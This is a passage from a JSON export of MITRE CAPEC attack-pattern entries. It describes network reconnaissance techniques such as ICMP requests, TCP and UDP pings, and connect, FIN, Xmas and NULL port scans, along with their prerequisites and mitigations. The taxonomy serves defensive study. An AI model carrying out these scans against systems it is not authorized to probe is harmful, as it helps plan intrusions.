Request","Abstraction":"Detailed","Status":"Stable","Description":"An adversary sends an ICMP Type 17 Address Mask Request to gather information about a target\'s networking configuration. ICMP Address Mask Requests are defined by RFC-950, \\"Internet Standard Subnetting Procedure.\\" An Address Mask Request is an ICMP type 17 message that triggers a remote system to respond with a list of its related subnets, as well as its default gateway and broadcast address via an ICMP type 18 Address Mask Reply datagram. Gathering this type of information helps the adversary plan router-based attacks as well as denial-of-service attacks against the broadcast address. Many modern operating systems will not respond to ICMP type 17 messages for security reasons. Determining whether a system or router will respond to an ICMP Address Mask Request helps the adversary determine operating system or firmware version. Additionally, because these types of messages are rare, they are easily spotted by intrusion detection systems. Many ICMP scanning tools support IP spoofing to help conceal the origin of the actual request among a storm of similar ICMP messages. It is a common practice for border firewalls and gateways to be configured to block ingress ICMP type 17 and egress ICMP type 18 messages.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"292","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":"The ability to send an ICMP type 17 query (Address Mask Request) to a remote target and receive an ICMP type 18 message (ICMP Address Mask Reply) in response. Generally, modern operating systems will ignore ICMP type 17 messages, however, routers will commonly respond to this request."},"Resources_Required":{"Resource":"The ability to send custom ICMP queries. This can be accomplished via the use of various scanners or utilities."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Hide Activities"}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pp. 53-54"},{"External_Reference_ID":"REF-139"},{"External_Reference_ID":"REF-123"},{"External_Reference_ID":"REF-125"},{"External_Reference_ID":"REF-34","Section":"Section 3.7.2 ICMP Probe Selection, pg. 70"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description Summary, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"295":{"ID":"295","Name":"Timestamp Request","Abstraction":"Detailed","Status":"Stable","Description":"This pattern of attack leverages standard requests to learn the exact time associated with a target system. An adversary may be able to use the timestamp returned from the target to attack time-based security algorithms, such as random number generators, or time-based authentication mechanisms.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"292","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":"The ability to send a timestamp request to a remote target and receive a response."},"Resources_Required":{"Resource":"Scanners or utilities that provide the ability to send custom ICMP queries."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Other"}},"Example_Instances":{"Example":["An adversary sends an ICMP type 13 Timestamp Request to determine the time as recorded by a remote target. Timestamp Replies, ICMP Type 14, usually return a value in Greenwich Mean Time. An adversary can attempt to use an ICMP Timestamp requests to \'ping\' a remote system to see if is alive. Additionally, because these types of messages are rare they are easily spotted by intrusion detection systems, many ICMP scanning tools support IP spoofing to help conceal the origin of the actual request among a storm of similar ICMP messages. It is a common practice for border firewalls and gateways to be configured to block ingress ICMP type 13 and egress ICMP type 14 messages.","An adversary may gather the system time or time zone from a local or remote system. This information may be gathered in a number of ways, such as with Net on Windows by performing net time \\\\\\\\hostname to gather the system time on a remote system. The victim\'s time zone may also be inferred from the current system time or gathered by using w32tm /tz. The information could be useful for performing other techniques, such as executing a file with a Scheduled Task, or to discover locality information based on time zone to assist in victim targeting"]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1124","Entry_Name":"System Time Discovery"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pp. 44-51"},{"External_Reference_ID":"REF-123"},{"External_Reference_ID":"REF-124"},{"External_Reference_ID":"REF-125"},{"External_Reference_ID":"REF-147","Section":"Section 3.7.2 ICMP Probe Selection, pg. 70"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Description Summary, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Prerequisites, Description Summary, Examples-Instances, References, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}],"Previous_Entry_Name":["ICMP Timestamp Request",{"Date":"2018-07-31"}]}},"296":{"ID":"296","Name":"ICMP Information Request","Abstraction":"Detailed","Status":"Stable","Description":"An adversary sends an ICMP Information Request to a host to determine if it will respond to this deprecated mechanism. ICMP Information Requests are a deprecated message type. Information Requests were originally used for diskless machines to automatically obtain their network configuration, but this message type has been superseded by more robust protocol implementations like DHCP.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"292","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":"The ability to send an ICMP Type 15 Information Request and receive an ICMP Type 16 Information Reply in response."},"Skills_Required":{"Skill":["The adversary needs to know certain linux commands for this type of attack.",{"Level":"Low"}]},"Resources_Required":{"Resource":"Scanners or utilities that provide the ability to send custom ICMP queries."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Other"}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pp. 44-51"},{"External_Reference_ID":"REF-123"},{"External_Reference_ID":"REF-124"},{"External_Reference_ID":"REF-125"},{"External_Reference_ID":"REF-34","Section":"Section 3.7.2 ICMP Probe Selection, pg. 70"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Description Summary, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required, Description Summary, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"297":{"ID":"297","Name":"TCP ACK Ping","Abstraction":"Detailed","Status":"Stable","Description":"An adversary sends a TCP segment with the ACK flag set to a remote host for the purpose of determining if the host is alive. This is one of several TCP \'ping\' types. The RFC 793 expected behavior for a service is to respond with a RST \'reset\' packet to any unsolicited ACK segment that is not part of an existing connection. So by sending an ACK segment to a port, the adversary can identify that the host is alive by looking for a RST packet. Typically, a remote server will respond with a RST regardless of whether a port is open or closed. In this way, TCP ACK pings cannot discover the state of a remote port because the behavior is the same in either case. The firewall will look up the ACK packet in its state-table and discard the segment because it does not correspond to any active connection. A TCP ACK Ping can be used to discover if a host is alive via RST response packets sent from the host.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"292","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":["The ability to send an ACK packet to a remote host and identify the response. Creating the ACK packet without building a full connection requires the use of raw sockets. As a result, it is not possible to send a TCP ACK ping from some systems (Windows XP SP 2) without the use of third-party packet drivers like Winpcap. On other systems (BSD, Linux) administrative privileges are required in order to write to the raw socket.","The target must employ a stateless firewall that lacks a rule set that rejects unsolicited ACK packets.","The adversary requires the ability to craft custom TCP ACK segments for use during network reconnaissance. Sending an ACK ping requires the ability to access \\"raw sockets\\" in order to create the packets with direct access to the packet header."]},"Resources_Required":{"Resource":"ACK scanning can be performed via the use of a port scanner or by raw socket manipulation using a scripting or programming language. Packet injection tools are also useful for this purpose. Depending upon the technique used it may also be necessary to sniff the network in order to see the response."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Mitigations":{"Mitigation":"Leverage stateful firewalls that allow for the rejection of a packet that is not part of an existing connection."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 49"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-34","Section":"Section 3.6.2 TCP ACK Ping, pg. 61"},{"External_Reference_ID":"REF-125"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Prerequisites, Description, Description Summary, Related_Weaknesses, Resources_Required, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"298":{"ID":"298","Name":"UDP Ping","Abstraction":"Detailed","Status":"Stable","Description":"An adversary sends a UDP datagram to the remote host to determine if the host is alive. If a UDP datagram is sent to an open UDP port there is very often no response, so a typical strategy for using a UDP ping is to send the datagram to a random high port on the target. The goal is to solicit an \'ICMP port unreachable\' message from the target, indicating that the host is alive. UDP pings are useful because some firewalls are not configured to block UDP datagrams sent to strange or typically unused ports, like ports in the 65K range. Additionally, while some firewalls may filter incoming ICMP, weaknesses in firewall rule-sets may allow certain types of ICMP (host unreachable, port unreachable) which are useful for UDP ping attempts.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"292","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":["The adversary requires the ability to send a UDP datagram to a remote host and receive a response.","The adversary requires the ability to craft custom UDP Packets for use during network reconnaissance.","The target\'s firewall must not be configured to block egress ICMP messages."]},"Resources_Required":{"Resource":"UDP pings can be performed via the use of a port scanner or by raw socket manipulation using a scripting or programming language. Packet injection tools are also useful for this purpose. Depending upon the technique used it may also be necessary to sniff the network in order to see the response."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Mitigations":{"Mitigation":"Configure your firewall to block egress ICMP messages."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 47"},{"External_Reference_ID":"REF-158"},{"External_Reference_ID":"REF-125"},{"External_Reference_ID":"REF-34","Section":"Section 3.6.3 TCP UDP Ping, pg. 63"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Prerequisites, Description, Description Summary, Related_Weaknesses, Resources_Required, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"299":{"ID":"299","Name":"TCP SYN Ping","Abstraction":"Detailed","Status":"Stable","Description":"An adversary uses TCP SYN packets as a means towards host discovery. Typical RFC 793 behavior specifies that when a TCP port is open, a host must respond to an incoming SYN \\"synchronize\\" packet by completing stage two of the \'three-way handshake\' - by sending an SYN/ACK in response. When a port is closed, RFC 793 behavior is to respond with a RST \\"reset\\" packet. This behavior can be used to \'ping\' a target to see if it is alive by sending a TCP SYN packet to a port and then looking for a RST or an ACK packet in response. Due to the different responses from open and closed ports, SYN packets can be used to determine the remote state of the port. A TCP SYN ping is also useful for discovering alive hosts protected by a stateful firewall. In cases where a specific firewall rule does not block access to a port, a SYN packet can pass through the firewall to the host and solicit a response from either an open or closed port. When a stateful firewall is present, SYN pings are preferable to ACK pings because a stateful firewall will typically drop all unsolicited ACK packets as they are not part of an existing or new connection. TCP SYN pings often fail when a stateless ACL or firewall is configured to blanket-filter incoming packets to a port. The firewall device will discard any SYN packets to a blocked port. Often, an adversary will alternate between SYN and ACK pings to discover if a host is alive.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"292","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":"The ability to send a TCP SYN packet to a remote target. Depending upon the operating system, the ability to craft SYN packets may require elevated privileges."},"Skills_Required":{"Skill":["The adversary needs to know how to craft and send protocol commands from the command line or within a tool.",{"Level":"Low"}]},"Resources_Required":{"Resource":"SYN pings can be performed via the use of a port scanner or by raw socket manipulation using a scripting or programming language. Packet injection tools are also useful for this purpose. Depending upon the technique used it may also be necessary to sniff the network in order to see the response."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 48"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-34","Section":"Section 3.6.2 TCP SYN Ping, pg. 61"},{"External_Reference_ID":"REF-125"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required, Description, Description Summary, Related_Weaknesses, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"300":{"ID":"300","Name":"Port Scanning","Abstraction":"Standard","Status":"Stable","Description":"An adversary uses a combination of techniques to determine the state of the ports on a remote target. Any service or application available for TCP or UDP networking will have a port open for communications over the network. Although common services have assigned port numbers, services and applications can run on arbitrary ports. Additionally, port scanning is complicated by the potential for any machine to have up to 65535 possible UDP or TCP services. The goal of port scanning is often broader than identifying open ports, but also give the adversary information concerning the firewall configuration. Depending upon the method of scanning that is used, the process can be stealthy or more obtrusive, the latter being more easily detectable due to the volume of packets involved, anomalous packet traits, or system logging. Typical port scanning activity involves sending probes to a range of ports and observing the responses. There are four port statuses that this type of attack aims to identify: open, closed, filtered, and unfiltered. For strategic purposes it is useful for an adversary to distinguish between an open port that is protected by a filter vs. a closed port that is not protected by a filter. Making these fine grained distinctions is requires certain scan types. Collecting this type of information tells the adversary which ports can be attacked directly, which must be attacked with filter evasion techniques like fragmentation, source port scans, and which ports are unprotected (i.e. not firewalled) but aren\'t hosting a network service. An adversary often combines various techniques in order to gain a more complete picture of the firewall filtering mechanisms in place for a host.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"169"}},"Prerequisites":{"Prerequisite":"The adversary requires logical access to the target\'s network in order to carry out this type of attack."},"Resources_Required":{"Resource":"The adversary requires a network mapping/scanning tool, or must conduct socket programming on the command line. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network in order to see the response."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1046","Entry_Name":"Network Service Scanning"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 54"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-158"},{"External_Reference_ID":"REF-34","Section":"Section 4.1 Introduction to Port Scanning, pg. 73"},{"External_Reference_ID":"REF-130"}]},"Notes":{"Note":["There are four types of port status that this type of attack aims to identify: 1) Open Port: The port is open and a firewall does not block access to the port, 2) Closed Port: The port is closed (i.e. no service resides there) and a firewall does not block access to the port, 3) Filtered Port: A firewall or ACL rule is blocking access to the port in some manner, although the presence of a listening service on the port cannot be verified, and 4) Unfiltered Port: A firewall or ACL rule is not blocking access to the port, although the presence of a listening service on the port cannot be verified.",{"Type":"Other"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Prerequisites, Description, Description Summary, References, Related_Weaknesses, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Description, Notes"}]}},"301":{"ID":"301","Name":"TCP Connect Scan","Abstraction":"Detailed","Status":"Stable","Description":"An adversary uses full TCP connection attempts to determine if a port is open on the target system. The scanning process involves completing a \'three-way handshake\' with a remote port, and reports the port as closed if the full handshake cannot be established. An advantage of TCP connect scanning is that it works against any TCP/IP stack. RFC 793 defines how TCP connections are established and torn down. TCP connect scanning commonly involves establishing a full connection, and then subsequently tearing it down, and therefore involves sending a significant number of packets to each port that is scanned. Compared to other types of scans, a TCP Connect scan is slow and methodical. This type of scanning causes considerable noise in system logs and can be spotted by IDS/IPS systems. TCP Connect scanning can detect when a port is open by completing the three-way handshake, but it cannot distinguish a port that is unfiltered with no service running on it from a port that is filtered by a firewall but contains an active service. Due to the significant volume of packets exchanged per port, TCP connect scanning can become very time consuming (performing a full TCP connect scan against a host can take multiple days). Generally, it is not used as a method for performing a comprehensive port scan, but is reserved for checking a short list of common ports.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"300"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Experiment","Description":"An adversary attempts to initialize a TCP connection with with the target port."},{"Step":"2","Phase":"Experiment","Description":"An adversary uses the result of their TCP connection to determine the state of the target port. A successful connection indicates a port is open with a service listening on it while a failed connection indicates the port is not open."}]},"Prerequisites":{"Prerequisite":"The adversary requires logical access to the target network. The TCP connect Scan requires the ability to connect to an available port and complete a \'three-way-handshake\' This scanning technique does not require any special privileges in order to perform. This type of scan works against all TCP/IP stack implementations."},"Resources_Required":{"Resource":"The adversary can leverage a network mapper or scanner, or perform this attack via routine socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network to see the response."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Mitigations":{"Mitigation":"Employ a robust network defense posture that includes an IDS/IPS system."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 54"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-34","Section":"Section 5.3 TCP Connect Scanning, pg. 100"},{"External_Reference_ID":"REF-130"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Prerequisites, Description, Description Summary, References, Related_Weaknesses, Resources_Required, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Execution_Flow"}]}},"302":{"ID":"302","Name":"TCP FIN Scan","Abstraction":"Detailed","Status":"Stable","Description":"An adversary uses a TCP FIN scan to determine if ports are closed on the target machine. This scan type is accomplished by sending TCP segments with the FIN bit set in the packet header. The RFC 793 expected behavior is that any TCP segment with an out-of-state Flag sent to an open port is discarded, whereas segments with out-of-state flags sent to closed ports should be handled with a RST in response. This behavior should allow the adversary to scan for closed ports by sending certain types of rule-breaking packets (out of sync or disallowed by the TCB) and detect closed ports via RST packets. In addition to its relative speed in comparison with other types of scans, the major advantage a TCP FIN Scan is its ability to scan through stateless firewall or ACL filters. Such filters are configured to block access to ports usually by preventing SYN packets, thus stopping any attempt to \'build\' a connection. FIN packets, like out-of-state ACK packets, tend to pass through such devices undetected. FIN scanning is still relatively stealthy as the packets tend to blend in with the background noise on a network link.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"300"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Experiment","Description":"An adversary sends TCP packets with the FIN flag but not associated with an existing connection to target ports."},{"Step":"2","Phase":"Experiment","Description":"An adversary uses the response from the target to determine the port\'s state. If no response is received the port is open. If a RST packet is received then the port is closed."}]},"Prerequisites":{"Prerequisite":"FIN scanning requires the use of raw sockets, and thus cannot be performed from some Windows systems (Windows XP SP 2, for example). On Unix and Linux, raw socket manipulations require root privileges."},"Resources_Required":{"Resource":"This attack pattern requires the ability to send TCP FIN segments to a host during network reconnaissance. This can be achieved via the use of a network mapper or scanner, or via raw socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network in order to see the response."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Mitigations":{"Mitigation":"FIN scans are detected via heuristic (non-signature) based algorithms, much in the same way as other scan types are detected. An IDS/IPS system with heuristic algorithms is required to detect them."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 55"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-147","Section":"Section 5.5 TCP FIN, NULL, XMAS Scans, pg. 107"},{"External_Reference_ID":"REF-130"}]},"Notes":{"Note":["Many operating systems, however, do not implement RFC 793 exactly and for this reason FIN scans do not work as expected against these devices. Some operating systems, like Microsoft Windows, send a RST packet in response to any out-of-sync (or malformed) TCP segments received by a listening socket (rather than dropping the packet via RFC 793), thus preventing an attacker from distinguishing between open and closed ports. FIN scans are limited by the range of platforms against which they work. Additionally, because open ports are inferred via no responses being generated, one cannot distinguish an open port from a filtered port without further analysis. For instance, FIN scanning a system protected by a stateful firewall may indicate all ports being open. For these reasons, FIN scanning results must always be interpreted as part of a larger scanning strategy.",{"Type":"Other"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description, Description Summary, References, Related_Weaknesses, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Description, Execution_Flow, Mitigations, Notes"}],"Previous_Entry_Name":["TCP FIN scan",{"Date":"2018-07-31"}]}},"303":{"ID":"303","Name":"TCP Xmas Scan","Abstraction":"Detailed","Status":"Stable","Description":"An adversary uses a TCP XMAS scan to determine if ports are closed on the target machine. This scan type is accomplished by sending TCP segments with all possible flags set in the packet header, generating packets that are illegal based on RFC 793. The RFC 793 expected behavior is that any TCP segment with an out-of-state Flag sent to an open port is discarded, whereas segments with out-of-state flags sent to closed ports should be handled with a RST in response. This behavior should allow an attacker to scan for closed ports by sending certain types of rule-breaking packets (out of sync or disallowed by the TCB) and detect closed ports via RST packets. In addition to its relative speed when compared with other types of scans, its major advantage is its ability to scan through stateless firewall or ACL filters. Such filters are configured to block access to ports usually by preventing SYN packets, thus stopping any attempt to \'build\' a connection. XMAS packets, like out-of-state FIN or ACK packets, tend to pass through such devices undetected. Because open ports are inferred via no responses being generated, one cannot distinguish an open port from a filtered port without further analysis. For instance, XMAS scanning a system protected by a stateful firewall may indicate all ports being open. Because of their obvious rule-breaking nature, XMAS scans are flagged by almost all intrusion prevention or intrusion detection systems.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"300"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Experiment","Description":"An adversary sends TCP packets with all flags set but not associated with an existing connection to target ports."},{"Step":"2","Phase":"Experiment","Description":"An adversary uses the response from the target to determine the port\'s state. If no response is received the port is open. If a RST packet is received then the port is closed."}]},"Prerequisites":{"Prerequisite":"The adversary needs logical access to the target network. XMAS scanning requires the use of raw sockets, and thus cannot be performed from some Windows systems (Windows XP SP 2, for example). On Unix and Linux, raw socket manipulations require root privileges."},"Resources_Required":{"Resource":"This attack can be carried out with a network mapper or scanner, or via raw socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network in order to see the response."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]},{"Scope":"Availability","Impact":"Unreliable Execution"}]},"Mitigations":{"Mitigation":"Employ a robust network defensive posture that includes a managed IDS/IPS."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-34","Section":"Section 5.5 TCP FIN, NULL, XMAS Scans, pg. 107"},{"External_Reference_ID":"REF-130"}]},"Notes":{"Note":["Many operating systems do not implement RFC 793 exactly and for this reason XMAS scans do not work as expected against these devices. Some operating systems, like Microsoft Windows, send a RST packet in response to any out-of-sync (or malformed) TCP segments received by a listening socket (rather than dropping the packet via RFC 793), thus preventing the adversary from distinguishing between open and closed ports. XMAS scans are limited by the range of platforms against which they work.",{"Type":"Other"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Prerequisites, Description, Description Summary, References, Related_Weaknesses, Resources_Required, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Description, Execution_Flow, Notes"}]}},"304":{"ID":"304","Name":"TCP Null Scan","Abstraction":"Detailed","Status":"Stable","Description":"An adversary uses a TCP NULL scan to determine if ports are closed on the target machine. This scan type is accomplished by sending TCP segments with no flags in the packet header, generating packets that are illegal based on RFC 793. The RFC 793 expected behavior is that any TCP segment with an out-of-state Flag sent to an open port is discarded, whereas segments with out-of-state flags sent to closed ports should be handled with a RST in response. This behavior should allow an attacker to scan for closed ports by sending certain types of rule-breaking packets (out of sync or disallowed by the TCB) and detect closed ports via RST packets. In addition to being fast, the major advantage of this scan type is its ability to scan through stateless firewall or ACL filters. Such filters are configured to block access to ports usually by preventing SYN packets, thus stopping any attempt to \'build\' a connection. NULL packets, like out-of-state FIN or ACK packets, tend to pass through such devices undetected. Additionally, because open ports are inferred via no responses being generated, one cannot distinguish an open port from a filtered port without further analysis. For instance, NULL scanning a system protected by a stateful firewall may indicate all ports being open. Because of their obvious rule-breaking nature, NULL scans are flagged by almost all intrusion prevention or intrusion detection systems.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"300"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Experiment","Description":"An adversary sends TCP packets with no flags set and that are not associated with an existing connection to target ports."},{"Step":"2","Phase":"Experiment","Description":"An adversary uses the response from the target to determine the port\'s state. If no response is received the port is open. If a RST packet is received then the port is closed."}]},"Prerequisites":{"Prerequisite":"The adversary requires logical access to the target network. NULL scanning requires the use of raw sockets, and thus cannot be performed from some Windows systems (Windows XP SP 2, for example). On Unix and Linux, raw socket manipulations require root privileges."},"Resources_Required":{"Resource":"This attack can be carried out via a network mapper/scanner, or via raw socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be 